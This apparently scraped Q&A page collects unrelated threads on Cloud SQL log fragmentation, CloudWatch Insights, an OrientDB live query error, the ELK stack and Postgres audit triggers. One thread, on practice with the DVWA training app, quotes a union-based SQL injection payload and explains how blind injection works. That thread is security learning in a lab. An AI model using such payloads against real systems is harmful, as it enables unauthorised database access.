When exporting logs to Pub/Sub (via Sink, Topic and Subscription) from a GCP Postgresql server (v11), some lines auditing cloudsqladmin internal user return what seems to be fragments of SQL queries run on the server. I am looking at them with the Logs viewer.
Examples:
db=cloudsqladmin,user=cloudsqladmin LOG: 00000: statement: WITH max_age AS ("
textPayload: "2020-11-10 23:30:01.188 UTC [*****]: [5-1] db=*********,user=cloudsqladmin LOG: 00000: statement: ;"
timestamp: "2020-11-10T23:30:01.188675Z"
It seems to be part of a longer query, but I can't logically attach it to any other adjacent log line.
Does this look like a bug on the GCP side, or am I missing something else here?
Screenshots:
I tried several flags, even the pgAudit beta flags, and I didn't find how to flatten the logs. In fact, when you write a multi line query (it's here the case with Cloud SQL, but also the case if you write your app with a multi-line log), it's logged in multi-line and print multiple single line logs.
If you sink the logs into Pub/Sub, you have a message per entry, and if you have multiple line logs, you have multiple messages.
You can mitigate the issue by removing the useless logs trace (system trace, increase the log level,...) and inline your business query to have nice logs.
It's a built in issue, it worth to fill a case here.
If you click on the left arrow in any of the logs you are interested, and then click on "Expand nested fields" you will see your complete query in that log (between other information).
Related
We currently have multiple cloudwatch log streams per ec2 instance. This is horrible to debug; queries for "ERROR XY" across all instances would involve either digging into each log stream (time consuming) or using aws cli (time consuming queries).
I would prefer to have a log stream combining the log data of all instances of a specific type, let's say all "webserver" instances log their "apache2" log data to one central stream and "php" log data to another central stream.
Obviously, I still want to be able to figure out which log entry stems from which instance - as I would be with central logging via syslogd.
How can I add the custom field "instance id" to the logs in cloudwatch?
The best way to organize logs in CloudWatch Logs is as follows:
The log group represents the log type. For example: webserver/prod.
The log stream represents the instance id (i.e. the source).
For querying, I highly recommend using the Insights feature (I helped build it when I worked # AWS). The log stream name will be available with each log record as a special #logStream field.
You can query across all instances like this:
filter #message like /ERROR XY/
Or inside one instance like this:
filter #message like /ERROR XY/ and #logStream = "instance_id"
Orientdb throws on each live query subscripion using binary protocoll following Nullpointer exception:
Error executing live query subscriber. java.lang.NullPointerException at com.orientechnologies.orient.server.network.protocol.binary.OLiveCommandResultListener.onLiveResult(OLiveCommandResultListener.java:113)
at com.orientechnologies.orient.core.sql.OCommandExecutorSQLLiveSelect$2.call(OCommandExecutorSQLLiveSelect.java:134)
at com.orientechnologies.orient.core.sql.OCommandExecutorSQLLiveSelect.execInSeparateDatabase(OCommandExecutorSQLLiveSelect.java:144)
at com.orientechnologies.orient.core.sql.OCommandExecutorSQLLiveSelect.onLiveResult(OCommandExecutorSQLLiveSelect.java:131)
at com.orientechnologies.orient.core.query.live.OLiveQueryQueueThread.run(OLiveQueryQueueThread.java:69)
The Live Query is subscribed by one client: "live select from Account where CheckInDateTime like "2018-02-25%"", Orientdb returns also the live request token ID gracefully. But when another client updates Account with "update Account set CheckInDateTime = "2018-02-25 13:00:00"" the mentioned NullPointerexception is thrown. I've tried to use versions 2.2.30 and 2.2.32 Comunity, DB Administrator and Server Administrator accounts. Also loading of plugins seems not to work (even the used version is 2.2.30 and 2.2.32 where Live Query should be enabled at server by default). Nothing seems to help to get that work, also queries like "live select from account" (without where ...).
Any further ideas? Thx.
Currently live queries do not support the WHERE clause you included in the query.
You can only select entire collections or V and E (which is what I use to get all updates)
If you would like to filter using that where, you will have to write it yourself in code.
Thx for answering mitchken! Fortunately, I found the mistake. The TCP connection from client to DB was in wrong state (must be all the time in waitforreadyread).
I am practicing for Security Testing. I came across DVWA and I started practicing for Sql Injection. I was doing fine till I started with SQL Injection (blind). No matter which query I try I am not getting the desired result.
For eg :
1' and 1=0 union select null,table_name from information_schema.tables#
simply returns User ID exists in the database.
I have set the DVWA Security to Low. Also made sure there are no errors on setup page of the application under Setup Check section.
Following are environment details:
Operating system: Windows
Backend database: MySQL
PHP version: 5.6.16
I think the answer is here and the behavior is expected
https://github.com/ethicalhack3r/DVWA/issues/12
Someone complained of the opposite behavior and the developer agreed, and a contributor named g0tm1lk fixed it. He made the exercise really "blind" and we have to use blind injection methods to test the vulnerability.
Showing the SQL error messages to the user is just: a SQL injection vuln + a misconfiguration issue.
A blind SQL injection might occur when the columns of the results returned by a query are not shown to the user. However, the user can tell somehow if the query returned any records or none.
E.g.: Suppose the url "http://www.example.com/user?id=USER_ID" returns:
200 if USER_ID exists
404 if USER_ID not exists
But it won't show any information from the query results (e.g. username, address, phone, etc)
If the page is vulnerable to SQLi [blind], an attacker won't be able get info from the DB printed in the result page, but he might be able to infer it by asking yes/no questions.
I have been studying online about ELK stack for my new project.
Although most of the tech blogs are about how to set ELK up.
Although I need more information to begin with.
What is Logstash ? Further, Logstash Shipper and Indexer.
What is Elasticsearch's role ?
Any leads will be appreciated too if not a proper answer.
I will try to explain the elk stack to you with an example.
Applications generate logs which all have the same format ( timestamp | loglevel | message ) on any machine in our cluster and write those logs to some file.
Filebeat (a logshipper from elk) tracks that file, gathers any updates to the file periodically and forwards them to logstash over the network. Unlike logstash Filebeat is a lightweight application that uses very little resources so I don't mind running it on every machine in the cluster. It notices when logstash is down and waits with tranferring data until logstash is running again (no logs are lost).
Logstash receives messages from all log shippers through the network and applies filters to the messages. In our case it splits up each entry into timestamp, loglevel and message. These are separate fields and can later be searched easily. Any messages that do not conform to that format will get a field: invalid logformat. These messages with fields are now forwarded to elastic search in a speed that elastic search can handle.
Elastic search stores all messages and indexes ( prepares for quick search) all the fields im the messages. It is our database.
We then use Kibana (also from elk) as a gui for accessing the logs. In kibana I can do something like: show me all logs from between 3-5 pm today with loglevel error whose message contains MyClass. Kibana will ask elasticsearch for the results and display them
I don't know, if this helps, but ... whatever... Let's take some really stupid example: I want to do statistics about squirrels in my neighborhood. Every squirrel has a name and we know what they look like. Each neighbor makes a log entry whenever he sees a squirrel eating a nut.
ElasticSearch is a document database that structures data in so called indices. It is able to save pieces (shards) of those indices redundantly on multiple servers and gives you great search functionalities. so you can access huge amounts of data very quickly.
Here we might have finished events that look like this:
{
"_index": "squirrels-2018",
"_id": "zr7zejfhs7fzfud",
"_version": 1,
"_source": {
"squirrel": "Bethany",
"neighbor": "A",
"#timestamp": "2018-10-26T15:22:35.613Z",
"meal": "hazelnut",
}
}
Logstash is the data collector and transformator. It's able to accept data from many different sources (files, databases, transport protocols, ...) with its input plugins. After using one of those input plugins all the data is stored in an Event object that can be manipulated with filters (add data, remove data, load additional data from other sources). When the data has the desired format, it can be distributed to many different outputs.
If neighbor A provides a MySQL database with the columns 'squirrel', 'time' and 'ate', but neighbor B likes to write CSVs with the columns 'name', 'nut' and 'when', we can use Logstash to accept both inputs. Then we rename the fields and parse the different datetime formats those neighbors might be using. If one of them likes to call Bethany 'Beth' we can change the data here to make it consistent. Eventually we send the result to ElasticSearch (and maybe other outputs as well).
Kibana is a visualization tool. It allows you to get an overview over your index structures and server status and create diagrams for your ElasticSearch data
Here we can do funny diagrams like 'Squirrel Sightings Per Minute' or 'Fattest Squirrel (based on nut intake)'
I have to investigate who or what caused tables rows to disappear.
So, I am thinking about creating "on before delete" trigger that logs the script that invokes the deletion. Is this possible? Can I get the db client name or event better - the script that invokes delete query and log it to another temporarly created log table?
I am open to other solutions, too.
Thanks in advance!
You can't get "the script" which issued the delete statement, but you can get various other information:
current_user will return the current Postgres user that initiated the delete statement
inet_client_addr() will return the IP address of the client's computer
current_query() will return the complete statement that caused the trigger to fire
More details about that kind of of functions are available in the manual:
http://www.postgresql.org/docs/current/static/functions-info.html
The Postgres Wiki contains two examples of such an audit trigger:
https://wiki.postgresql.org/wiki/Audit_trigger_91plus
https://wiki.postgresql.org/wiki/Audit_trigger (somewhat outdated)